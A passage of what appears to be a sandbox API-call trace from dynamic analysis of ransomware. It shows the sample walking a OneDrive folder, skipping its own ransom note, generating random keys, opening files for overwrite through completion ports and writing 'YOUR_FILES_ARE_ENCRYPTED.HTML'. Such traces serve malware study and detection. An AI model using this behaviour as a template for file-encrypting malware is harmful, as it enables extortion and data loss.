lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncApi.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncApi.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncApi.dll" [0112.388] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x660338, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.389] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x660338, lpOverlapped=0x660338) returned 1 [0112.389] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8878a7e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8878a7e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc424655, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x1d9ec0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSyncClient.dll", cAlternateFileName="FILESY~4.DLL")) returned 1 [0112.389] StrStrIW (lpFirst="FileSyncClient.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.389] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncClient.dll") returned 94 [0112.389] PathFindExtensionW (pszPath="FileSyncClient.dll") returned=".dll" [0112.389] lstrlenW (lpString=".dll") returned 4 [0112.389] PathFindExtensionW (pszPath="FileSyncClient.dll") returned=".dll" [0112.389] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncClient.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\filesyncclient.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0112.392] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=1941184) returned 1 [0112.392] GetProcessHeap () returned 0x600000 [0112.392] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x688490 [0112.398] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="42") returned 2 [0112.398] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="2B") returned 2 [0112.398] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="20") returned 2 [0112.398] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="71") returned 2 [0112.398] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="86") returned 2 [0112.398] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="59") returned 2 [0112.398] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="82") returned 2 [0112.398] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="A8") returned 2 [0112.398] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="05") returned 2 [0112.398] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="D9") returned 2 [0112.398] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="84") returned 2 [0112.398] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="82") returned 2 [0112.399] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="DC") returned 2 [0112.399] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="6D") returned 2 [0112.399] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="D7") returned 2 [0112.399] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="17") returned 2 [0112.399] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="29") returned 2 [0112.399] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="C1") returned 2 [0112.399] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="F0") returned 2 [0112.399] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="EC") returned 2 [0112.399] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="FA") returned 2 [0112.399] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="9F") returned 2 [0112.399] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="1B") returned 2 [0112.399] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="9E") returned 2 [0112.399] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="2B") returned 2 [0112.399] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="E6") returned 2 [0112.399] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="3E") returned 2 [0112.399] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="E4") returned 2 [0112.399] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="F8") returned 2 [0112.399] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="8A") returned 2 [0112.399] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="B5") returned 2 [0112.399] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="6D") returned 2 [0112.400] lstrcpyW (in: lpString1=0x698544, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncClient.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncClient.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncClient.dll" [0112.400] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x688490, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.400] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x688490, lpOverlapped=0x688490) returned 1 [0112.400] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcbbde9d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfcbbde9d, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfd2fec9b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x238c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSyncConfig.exe", cAlternateFileName="FILESY~1.EXE")) returned 1 [0112.400] StrStrIW (lpFirst="FileSyncConfig.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.400] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncConfig.exe") returned 94 [0112.400] PathFindExtensionW (pszPath="FileSyncConfig.exe") returned=".exe" [0112.400] lstrlenW (lpString=".exe") returned 4 [0112.400] PathFindExtensionW (pszPath="FileSyncConfig.exe") returned=".exe" [0112.401] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd704ae4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfd704ae4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x23231a2, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x1464c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSyncSessions.dll", cAlternateFileName="FIFC38~1.DLL")) returned 1 [0112.401] StrStrIW (lpFirst="FileSyncSessions.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.401] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncSessions.dll") returned 96 [0112.401] PathFindExtensionW (pszPath="FileSyncSessions.dll") returned=".dll" [0112.401] lstrlenW (lpString=".dll") returned 4 [0112.401] PathFindExtensionW (pszPath="FileSyncSessions.dll") returned=".dll" [0112.401] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncSessions.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\filesyncsessions.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0112.406] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=1336512) returned 1 [0112.406] GetProcessHeap () returned 0x600000 [0112.406] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0112.408] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="7D") returned 2 [0112.408] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="3E") returned 2 [0112.408] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="42") returned 2 [0112.408] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="39") returned 2 [0112.408] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="DC") returned 2 [0112.408] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="D4") returned 2 [0112.408] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="C5") returned 2 [0112.409] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="8F") returned 2 [0112.409] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="77") returned 2 [0112.409] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="E7") returned 2 [0112.409] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="45") returned 2 [0112.409] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="90") returned 2 [0112.409] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="E9") returned 2 [0112.409] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="A5") returned 2 [0112.409] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="99") returned 2 [0112.409] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="29") returned 2 [0112.409] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="95") returned 2 [0112.409] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="F3") returned 2 [0112.409] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="22") returned 2 [0112.409] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="BB") returned 2 [0112.409] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="6C") returned 2 [0112.409] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="D9") returned 2 [0112.409] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="C3") returned 2 [0112.409] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="EB") returned 2 [0112.409] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="7E") returned 2 [0112.409] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="6F") returned 2 [0112.409] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="5A") returned 2 [0112.409] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="A6") returned 2 [0112.409] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="05") returned 2 [0112.409] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="2B") returned 2 [0112.409] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="84") returned 2 [0112.409] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="2B") returned 2 [0112.410] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncSessions.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncSessions.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncSessions.dll" [0112.410] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.410] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0112.410] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2454520, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x2454520, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x253922a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x182cc0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSyncShell.dll", cAlternateFileName="FI340C~1.DLL")) returned 1 [0112.410] StrStrIW (lpFirst="FileSyncShell.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.410] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncShell.dll") returned 93 [0112.410] PathFindExtensionW (pszPath="FileSyncShell.dll") returned=".dll" [0112.411] lstrlenW (lpString=".dll") returned 4 [0112.411] PathFindExtensionW (pszPath="FileSyncShell.dll") returned=".dll" [0112.411] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncShell.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\filesyncshell.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0112.414] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=1584320) returned 1 [0112.414] GetProcessHeap () returned 0x600000 [0112.414] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0112.417] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="8E") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="52") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="05") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="F1") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="FC") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="FC") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="F7") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="CE") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="F4") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="C7") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="B1") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="C8") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="EE") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="2E") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="00") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="C0") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="79") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="DA") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="0C") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="C7") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="95") returned 2 [0112.417] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="30") returned 2 [0112.417] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="AE") returned 2 [0112.418] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="B8") returned 2 [0112.418] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="0F") returned 2 [0112.418] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="B6") returned 2 [0112.418] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="9E") returned 2 [0112.418] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="BD") returned 2 [0112.418] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="7D") returned 2 [0112.418] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="C7") returned 2 [0112.418] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="30") returned 2 [0112.418] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="5A") returned 2 [0112.418] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncShell.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncShell.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncShell.dll" [0112.418] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.418] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0112.419] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2538864, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xd2538864, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xd2538864, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="is", cAlternateFileName="")) returned 1 [0112.419] StrStrIW (lpFirst="is", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.419] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\is") returned 78 [0112.419] GetProcessHeap () returned 0x600000 [0112.419] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0112.427] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\is" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\is") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\is" [0112.427] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\is", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\is\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\is\\*" [0112.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\is\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2538864, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xd2538864, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xd779fe38, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName=".", cAlternateFileName="")) returned 0x626638 [0112.427] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2538864, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xd2538864, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xd779fe38, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="..", cAlternateFileName="")) returned 1 [0112.427] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd779fe38, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xd779fe38, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xda79b1fb, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.427] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.428] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\is\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.428] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.428] lstrlenW (lpString=".mui") returned 4 [0112.428] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.428] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd779fe38, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xd779fe38, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xda79b1fb, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.428] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0112.428] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\is\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.428] GetProcessHeap () returned 0x600000 [0112.428] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\is\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\is\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0112.428] WriteFile (in: hFile=0x334, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.429] CloseHandle (hObject=0x334) returned 1 [0112.429] GetProcessHeap () returned 0x600000 [0112.429] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.430] GetProcessHeap () returned 0x600000 [0112.430] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.430] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdab2e911, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdab2e911, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdab2e911, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="it", cAlternateFileName="")) returned 1 [0112.430] StrStrIW (lpFirst="it", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.430] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\it") returned 78 [0112.430] GetProcessHeap () returned 0x600000 [0112.430] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0112.430] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\it" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\it") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\it" [0112.430] lstrcatW (in: 